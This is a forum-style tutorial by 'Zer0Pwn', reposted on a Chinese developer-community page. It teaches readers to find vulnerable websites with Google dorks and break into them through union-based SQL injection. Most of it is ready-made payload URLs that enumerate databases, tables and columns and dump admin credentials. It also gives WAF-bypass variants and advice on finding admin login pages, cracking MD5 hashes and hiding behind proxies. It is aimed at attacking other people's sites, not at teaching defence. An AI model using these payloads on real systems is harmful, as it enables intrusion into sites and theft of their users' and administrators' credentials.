开发者社区> cnbird> 正文

Full Detailed Basic SQL Injection - Zer0PwN

简介:                                                 _,.
+关注继续查看
 

                                              _,.----..
                 _________________________ ,-:::::::::::+ ________
                |                        .::;;%%%%%%;:::::.       |
                |                      ,:::%%%-'" "`-%;--::\      |
                |                     /:::;%%;      .-":::::.     |
                |                     (::::%%i   _._i:::::::i     |
                |                     i::::;%i  ',, i:::::::[     |
                |                    ,:::::%%/ ,-o; ]::::::%|     |
                |                   +:::;%;-'   ""  /%:::::%|     |
                |                 ,:::;%i+==,     ,+:::::::%%.    |
                |               ,:::;%%%%\"",-.-:::::::::::%%%.   |
                |              i::::%%%%%/:;:''"`:::::::::::%%%\  |
                |              Y::::%%%%;'"      ):::::::::::%%%  |
                |              :::::;-"         ,:;::::::::::%%%i_|
                |              _>n$6n.         /:/:::::::::::/"...|
                |       _,.nn$$$$88888i _,.-'" \;::::::/"` "":::::|
                |  _.n$$$$$$$$8888888='"       i::::::/.::::;::o88|
                |o8$$$8888888888P^;;+ ,'.---.  `:;;;%j ::d88888888|
             ,o8888888888888P^".-+.   ,::*::::   +%%%i :|88%%^"'.'|
           .8888888^^^''""     |%*::-.%:::::::i    f | :|88%:.. . |
         ,888P'"|               \%%%%%\%%%%%%%<   j  | :|88%: .   |
       ,d888"   |                "-%%%%%$$$%$*%\  ;  | :]88%:. . .|
      ,8^88"    |                      \%%%%%%%%. i  i::|888%: . .|
      "  `      |                       `%%%%%%%%. \ j :|888%:....|
                |                         `-%%%%%%. \| :i88%%::%%%|
                |                            "-%%%%% + :|88%%%%o88|
                |                               +%%%%| ::888888888|
                |                                 +%%] :|88888^^'_|
                |                   __,.---;;;;;--/:%. :i8+".-::::|
                |              _.-::--':*::::::::::::i :`.-::;;;-:|
                |           .-::::::*::::::::::o:::::[ ::::-%%%%%%|
                |         +::::*::::::::::::*:::::;%%[ :|%%%%%%%%%|
                |         \%%%%%%;;;;;::;;;+%%%%%%%%%| :|%%%%%%%%'|
                |          i%%%%%%%%%%%%%%%%%%%%%%%%%i :|%%%%%%':.|
                |          i%%%%%%%^'^%%%%%%%%%%%%%%%' :i^':.:.:-'|
                |           Y%%[   :::::::::""":::::   :i:--"""  .|
                |           i%%j  :,^.._   ___         :     _.;:-|
                |           |%%i  :f%%%%%%%   """""%.  : .-:"     |
                |           i%%| :j%%%%%%%%\       %%) : i        |
                |           |%%i :|%%%%%%%%%%      :%| : |        |
                |           i%%|  `%%%%%%%%%%%\    ::t : |        |
                |           |%%i  :|%%%%%%%%%%%\   :: [: |        |
                |           |%%%  :`%%%%%%%%%%%%   :: |: |        |
                |           i%%%i  :|%%%%%%%%%%%\  :: |: |        |
                |           |%%%%i :|%%%%%%%%%%%%% :: i: |        |
                |___________|%%%%%__:%%%%%%%%%%%%%%\:_j__j________|
---------------------------------------------------
>GR33TZ T0 Zer0Lulz Group
>d0nt L33ch
>Author Zer0Pwn
>Paper= Sql Injection Tutorial
>Homep4ge % Hackforums.net
---------------------------------------------------

 

Hey guys, today I'm going to give you a good, detailed and basic SQL Injection tutorial. I suppose most of you are beginners to SQL Injection. So let's do a quick review to see what an SQL Injection really is.

What Is an SQL Injection?

An SQL Injection, is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information. Such as Emails, Usernames, Passwords, etc.
In this Tutorial, we'll be looking for the Admin Panel's credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily.

Finding a Vulnerable Site

You can find a vulnerable site using Dorks. Use google, it's the best way. A dork is something like this

Code:
inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=

There are Hundreds of Thousands of others, and there are also some Posts about Dorks, so you could read those if you want to find a good site to exploit with SQL Injection.

Exploiting the Database

Alright? Are you all ready for the fun of an SQL Injection? Okay, so first, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name for my Example:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1

Our site HAS to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put a ' so that it looks like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1'

Now if we get a MySQL error, then our site is probably vulnerable. If it just refreshes the page normally, then our site is not vulnerable.

Finding the number of columns

Now, we know our site is vulnerable to SQL Injection, so we want to start getting the Info out of the Database. But before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. But we don't know how many columns there are yet, so we need that first. To find the number of columns we need to use a command called 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--

Now if the site just refreshed to it's normal state, that's good. So we didn't get an error, so we have to continue until we get an error.

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--
*ERROR*

Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.

URGENT
The two hyphen's (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we NEED those at the end of every command.

Finding the vulnerable column

We now have the number of columns. But we just need to find out which one(s) are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--

A couple of number will appear on your screen. That is normal, and is a good sign. Those numbers, are the numbers of columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. So lets say that column 2 appeared on the Page. We will be executing commands in column 2.

URGENT
You HAVE to have the - after the =. That is critical.

Determining the Version of the MySQL Database

Why do we need the version you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.

So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--

Now it should display the Version on the page. It should look something like this:

Code:
5.1.47-community-log

The numbers don't matter, as long as they're at least 5, or over.

Finding the name of the Database

The name of the Database is important. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is:

Code:
http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--

Sometimes, that command will show you more than the Database name. But all we want is the database name, so the better command would prefferably be:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--

Now you will be showed the Database name. Congrats, look how far we are already. Now to the good stuff!

Viewing the Tables in the Database

The tables are what contains information. That's why we need to view them. So we can get the information we seek.

The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

Hit enter, and the Tables in the Database will be displayed. Yeye

Viewing the Tables' information

We will most likely be given many tables. It is up to you to decide which one contains the valuable information.

So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"

For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex.

To do that, I reccomend this site:
Spoiler (Click to View)

Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73

URGENT
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.

Displaying the Contents

There will still be some tables inside the table you've chosen. So you need to get the information, and that will usually mean goodbye tables, and HELLO Admin Panel access.

Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--

That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. An where it says admin_credentials, you need to put the table that you are inside of.

Now we should have all the credentials, so we just need to find the Admin Login.

Finding the AdminLogin

Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin.

Like this:

Code:
http://www.hopefullyvulnerablesite.com/admin
http://www.hopefullyvulnerablesite.com/admin.php
http://www.hopefullyvulnerablesite.com/login.php
http://www.hopefullyvulnerablesite.com/admin/index.php
http://www.hopefullyvulnerablesite.com/login/index.php
http://www.hopefullyvulnerablesite.com/adminlogin
http://www.hopefullyvulnerablesite.com/adminlogin.php
http://www.hopefullyvulnerablesite.com/adminlogin/index.php
http://www.hopefullyvulnerablesite.com/moderator.php
http://www.hopefullyvulnerablesite.com/moderator
http://www.hopefullyvulnerablesite.com/modlogin

And there are plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it brings a more proud-ness after hacking the Website.

WAF By-Passing

You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is.

WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. The WAF filters commands put through to the Database, and detects attakcs against the site.

A WAF Error will look like this:

Code:
FORBIDDEN

You are not allowed to access "" on this server
*INFORMATION ABOUT THE WEBSERVER IS HERE*

If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack.

There are several methods on how to by-pass the WAF, I will be explaining a few:

1.
You don't have to worry about getting the number of columns, the Firewalls don't block that, however, the DO block the union select command, so here is method 1, on how to By-Pass the Firewall.

The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--

That will by-pass the Firewall. However, we still have several steps. Because we still need the other information from the tables and columns.

Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like:

Code:
http://www.hopefullyvulnerablesite.com/event.phpid=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--

To make this tutorial a little shorter, we'll be grabbing more information with just one command. So let's try it like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--

Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name.

Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--

Now, that will be displaying all the tables. Now that access the table's information, we're going to use this commdn to by-pass the firewall:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--

There we go, now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*

And that's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert :). If you need any more help, feel free to PM me, or even add a comment. I really hope this helped, good luck!

Cracking Hashes

What is a Hash you may be asking? A hash is basically an encrypted version of a Password, or any other "Hidden" information that can be used against the person, and/or site. People encrypt their passwords into a Hash, so that if there is a security breach, it will be hard to get the true password of the User, or Admin Panel.

There are many types of hashes, but the most popular to this day, is the MD5 hash. MD5 isn't an easy hash to decrypt, because you have to encrypt other passwords, and compare them to the Hash, there is no official way to decrypt them in any other way.

The best site you'll find on decrypting a Hash, would definitely be
Spoiler (Click to Hide)
http://www.md5decrypter.co.uk/

But, if you've got some time on your hands, and if you would like a better decryption, I reccomend using Cain & Abel. You can perform a dictionary attack on a the MD5 encrypted Hash.
You'll need a wordlist.
This dictionary attack won't ALWAYS work, but most of the time it will. It all depends on the knowledge of the Webmaster. Some people use random strings of numerals and letters. Which in that case, you'd have to Bruteforce, which would be much more of a hassle.

There are plenty of Wordlists that you can find on HF. If you can't find any, PM me and I'll give you a link.

Epilogue

This tutorial took me a long time to write, and I really hope this will help people understand how to perform an SQL Injection.

SQL Injection IS ILLEGAL. So whatever you do with it, is your responsibilty, not mine. You can get in lots of trouble for an SQL Injection. Check out the Proxies and Socks section for protection while hacking a site.

Good luck! And have fun!

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
如何设置阿里云服务器安全组?阿里云安全组规则详细解说
阿里云安全组设置详细图文教程(收藏起来) 阿里云服务器安全组设置规则分享,阿里云服务器安全组如何放行端口设置教程。阿里云会要求客户设置安全组,如果不设置,阿里云会指定默认的安全组。那么,这个安全组是什么呢?顾名思义,就是为了服务器安全设置的。安全组其实就是一个虚拟的防火墙,可以让用户从端口、IP的维度来筛选对应服务器的访问者,从而形成一个云上的安全域。
19776 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,阿里云优惠总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系.
29079 0
阿里云服务器安全组设置内网互通的方法
虽然0.0.0.0/0使用非常方便,但是发现很多同学使用它来做内网互通,这是有安全风险的,实例有可能会在经典网络被内网IP访问到。下面介绍一下四种安全的内网互联设置方法。 购买前请先:领取阿里云幸运券,有很多优惠,可到下文中领取。
22531 0
阿里云服务器ECS登录用户名是什么?系统不同默认账号也不同
阿里云服务器Windows系统默认用户名administrator,Linux镜像服务器用户名root
16421 0
阿里云服务器端口号设置
阿里云服务器初级使用者可能面临的问题之一. 使用tomcat或者其他服务器软件设置端口号后,比如 一些不是默认的, mysql的 3306, mssql的1433,有时候打不开网页, 原因是没有在ecs安全组去设置这个端口号. 解决: 点击ecs下网络和安全下的安全组 在弹出的安全组中,如果没有就新建安全组,然后点击配置规则 最后如上图点击添加...或快速创建.   have fun!  将编程看作是一门艺术,而不单单是个技术。
20687 0
腾讯云服务器 设置ngxin + fastdfs +tomcat 开机自启动
在tomcat中新建一个可以启动的 .sh 脚本文件 /usr/local/tomcat7/bin/ export JAVA_HOME=/usr/local/java/jdk7 export PATH=$JAVA_HOME/bin/:$PATH export CLASSPATH=.
14896 0
阿里云服务器怎么设置密码?怎么停机?怎么重启服务器?
如果在创建实例时没有设置密码,或者密码丢失,您可以在控制台上重新设置实例的登录密码。本文仅描述如何在 ECS 管理控制台上修改实例登录密码。
23576 0
+关注
cnbird
阿里云安全专家,主要负责阿里云云产品安全。
4033
文章
3
问答
文章排行榜
最热
最新
相关电子书
更多
JS零基础入门教程(上册)
立即下载
性能优化方法论
立即下载
手把手学习日志服务SLS,云启实验室实战指南
立即下载